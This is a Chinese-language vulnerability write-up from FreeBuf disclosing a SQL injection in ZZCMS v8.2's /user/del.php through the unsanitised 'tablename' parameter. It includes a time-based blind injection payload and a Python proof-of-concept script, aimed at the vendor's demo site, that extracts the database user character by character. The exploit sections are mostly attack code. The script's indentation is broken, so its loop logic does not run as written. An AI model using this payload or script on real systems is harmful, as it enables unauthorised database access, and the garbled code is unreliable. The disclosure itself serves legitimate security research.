ZZCMS v8.2 最新版SQL注入漏洞

2018-02-07 660661人围观 ,发现 17 个不明物体 WEB安全漏洞

*本文原创作者:vr_system,本文属FreeBuf原创奖励计划,未经许可禁止转载

0×00概述

近期一直在致力于审计CMS的漏洞,当审计遇到ZZCMS v8.2,发现SQL注入漏洞。

0×01 白盒审计

通过白盒审计工具,发现 /user/del.php 存在SQL注入漏洞。

代码位置: /user/del.php 12行,获取参数。

图片1.png

由于存在checkid() 导致 $id无法进行注入,checkid() 代码如图。

代码位置:/inc/function.php  49行

图片2.png

在switch() 分支中不存在SQL注入就不展示代码了。在后面代码中 135行 发现存在SQL注入问题。

图片3.png

$tablename 可控,可以进行SQL注入。由于$tablename 所在位置无需闭合引号和CMS过滤大于号和小于号(转换为实体),拼接为 select id,editor, from zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)#where id in 1; 拼接成如此的SQL语句可以完成注入。

0×02 漏洞利用

测试payload:id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)%23

测试结果如图。

图片4.png

0x03POC

用python完成POC进行批量漏洞利用,猜测用户名的第一个字符。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串
url = "http://demo.zzcms.net/user/del.php"
user = ''
for i in range(1, 2):
        for payload in payloads:    #遍历取出字符
                startTime = time.time()
                post_data = "id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1))=" + str(ord(payload)) + "),sleep(5),1)%23".encode("utf-8")
                response = requests.post(url, timeout=6, data=post_data, headers={"Content-Type": "application/x-www-form-urlencoded"}  )
if time.time() - startTime > 5:
                        user = payload
print 'user is:', user
break
print '\n[Done] current user is %s' % user

TIM截图20180201125625.png

*本文原创作者:vr_system,本文属FreeBuf原创奖励计划,未经许可禁止转载

这些评论亮了

  • vr_system (1级) 安天365安全研究团队 回复
    @ test 跳到登录管理页面,并不等同于登录管理后页面。有密码和SQL注入是不同层面的事情。
    )8( 亮了
  • hyrra (1级) 回复
    @ test 复现了一下, 这个注入并不需要登录
    )6( 亮了
发表评论

已有 17 条评论

取消
Loading...
css.php